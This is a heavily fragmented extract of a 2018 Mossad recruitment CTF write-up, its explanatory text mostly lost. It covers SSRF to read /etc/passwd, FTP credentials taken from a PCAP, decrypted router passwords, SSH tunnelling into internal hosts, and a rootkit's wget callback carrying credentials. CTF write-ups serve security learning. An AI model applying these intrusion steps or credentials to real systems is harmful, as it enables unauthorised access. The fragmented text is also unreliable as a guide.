2018 Image result for mossad are you readycodesign.blog/wp-content/uploads/2018/04/msd181.pdf ·...

Date post: 30-Jan-2021
  • 2018

    2 31

    2018

    https://www.google.co.il/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&uact=8&ved=2ahUKEwiY0t2N8M_aAhUIuhQKHUYYADYQjRx6BAgAEAU&url=https%3A%2F%2Fwww.breakingisraelnews.com%2F67634%2Fcrack-code-join-mossad%2F&psig=AOvVaw3x9-OQ3YCfcpWl0sk9BfGw&ust=1524554997563347

  • IP

    News Blog

    PCAP

    rootkit

  • | IP 1. 18.4.2018 20:00 - 0

    https://www.r-u-ready.xyz/

    2. Brainfuck .

    2.1.

  • 2.2. - xor-with-key. 3. XOR HEX Brainfuck 2.1

    .

    4. Israel-Is-70

    String - HEX XOR .

    5. IP 35.205.32.11

  • | News Blog http://35.205.32.11/

    1. phishing.

    2. 2.1. .

    3. 3.1.

    http://35.205.32.11/main

  • 3.2. source code

    3.3.

    http://35.205.32.11/administration

    3.4. ,

    :

    http://35.205.32.11/register

  • 3.5. SSRF.

    3.5.1. client ,

    web console - :

  • 3.6. /etc/passwd

    3.6.1.

    3.7. login.php :

    3.7.1.

    3.7.2. login.php.

  • 3.7.3.

    3.8. loopback (127.0.0.1)

  • 3.8.1. console :

    3.8.2.

    3.9. console :

    3.9.1.

    http://35.205.32.11/profilePics/administration

    3.10. IP anonymous :

    http://35.205.32.11/ch1_success

  • | PCAP

    1. phishing

    2. 2.1. PCAP

    2.2. FTP

    2.3.

    2.4. storage

    3. 3.1. wireshark FTP

    35.204.90.89 2121

    3.1.1. username : user , password: 12345

  • 3.2. FTP

    3.3. pcap FTP

    5555 – HASH :

    strings :

    3.3.1. hash md5 - 37478

    3.3.2. 37479 hash sha512 :

    3.3.3. 5555:

    3.3.4. hash 19922

  • 3.4. FTP 5555 hash

    1 hash sha512.

    3.4.1. script

    3.4.2. script FTP

    3.5. FTP 2121 PCAP

  • 3.5.1. Linux

    FileZilla

    3.6. FTP 4

    3.6.1. /usr/backup

    Id_rsa Hint latest FW - floppyfw.conf.enc

    3.6.2. backup cisco - cisco.conf.enc

    3.7. hint s3cr3t - RSA

  • 3.8. RSA SSH

    shell /bin/false :

    3.8.1. SFTP –

    3.8.2. conf_enc.pyc -

    FTP

    3.9. decompile pyc

    3.9.1. :

    3.10. script

    3.10.1. google

    https://gist.github.com/swinton/8409454

  • 3.10.2. Decrypt

    3.11. FTP

    3.11.1. cisco.conf - cisco

    3.11.1.1. fwadmin

    3.11.1.2. username : fwadmin password:

    Sup3rS3cr#tP@ssword

    3.11.1.3. router access-list

    3.11.1.4. router

    10.128.0.3 3389 8080

  • 10.164.0.3 22

    3.11.2. floppyfw.conf

    3.11.2.1. FW 10.164.0.3 router

    SSH (

    3.11.2.2. FW

    3.11.3.

    3.11.3.1. storage 10.128.0.3

    3.11.3.2. FW

    10.164.0.3

    3.11.3.3. storage 3389 8080

    3.12. 10.164.0.3

    ssh tunneling FTP ssh tunnel FW tunnel

    10.128.0.3 8080 .

    3.12.1. backup SSH

    3.12.2.

    3.12.3. FW

    3.12.4. router - Sup3rS3cr#tP@ssword

    3.12.5. 8888

    3.13. storage

    http://35.205.32.11/ch1_success

    3.13.1. stolen_files/ mossad_2018_challenge.solution.doc

    3.13.2.

    http://localhost:8888/

    | rootkit

    1.

    2. 2.1.

    2.2. ISO

    2.3. JS

    3. 3.1. zip busybox

    3.2. file

    3.2.1. ELF 64-

    3.2.2. VM

    3.3. /tmp/

    3.3.1. tmp

    3.3.2. ls busybox

    3.3.3.

    3.3.3.1.

    3.4. tmp

    3.4.1. .readme tmp

    3.5. suspicious network activity detected 3.5.1. .readme busybox

    3.6. ps Process

    3.6.1. PID 1337 tmp/Tr0j linux

    process

    3.6.1.1. admin

    3.6.2. /proc/1337 proc oply(

    3.6.2.1. busybox

    3.6.3. strings

    3.6.3.1. wget

    http://35.205.32.11/iso?user=admin&pass=Uw1lLN3v3rG3tM3

    3.6.3.2. ZIP ISO

    3.7. mount

    3.7.1. ISO

    )thumbs.db (vault

    3.7.1.1.

    3.7.2. file vault SQLite

    3.7.3. 4 HTML 3 JS

    3.7.3.1. Blowfish-CBC .

  • 3.7.4. JS key

    ISO thumb.db

    3.7.4.1. thumb.db

    3.7.4.2. KEY - *israel70*

    3.8. http://sladex.org/blowfish.js/ decrypt 3 JS .

    3.8.1. key.js

    3.8.2. aes.js

  • 3.8.3. script.js unpack (

    3.8.4. HTML

    3.9. 3 127.0.0.1( 1337

    key 2

    3.10. web python.

  • 3.11. HTML

    3.12. key - JSONdebug js

    3.12.1. base64 decode –

    !

  • 3.13.

    3.14.

    http://35.205.32.11/ch3_finish/mZ3JyMmakpidmJ6az5+SzM+ZzJ3MzJ2cyJzOk5mSnp4
